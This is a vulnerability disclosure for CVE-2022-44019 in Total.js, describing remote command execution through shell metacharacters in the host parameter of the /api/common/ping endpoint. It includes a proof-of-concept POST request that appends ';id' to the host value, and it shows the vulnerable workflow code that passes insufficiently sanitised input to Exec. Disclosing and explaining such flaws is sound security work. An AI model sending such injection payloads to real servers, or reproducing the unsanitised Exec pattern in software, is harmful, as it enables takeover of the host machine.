Headline
CVE-2022-44019: [Security] Remote command execution · Issue #12 · totaljs/code
In Total.js 4 before 0e5ace7, /api/common/ping can achieve remote command execution via shell metacharacters in the host parameter.
Using the API /api/common/ping it’s possible to achieve remote command execution on the host machine. This leads to complete control over the machine hosting the server.
POST /api/common/ping HTTP/1.1
Host: 0.0.0.0:8000
User-Agent: bla-bla-bla
Cookie: your-auth-cookie
Content-Length: 15
host=1.1.1.1;id
schema.addWorkflow('ping', function($) {
var host \= $.model.host.replace(/'|"|\\n/g, '');
Exec('ping -c 3 {0}'.format(host), $.done(true));
});
Here the problem is the fact that the server doesn’t sanitize correctly the input checking that the host provided is a legitimate one, allowing also characters like ;, | or &.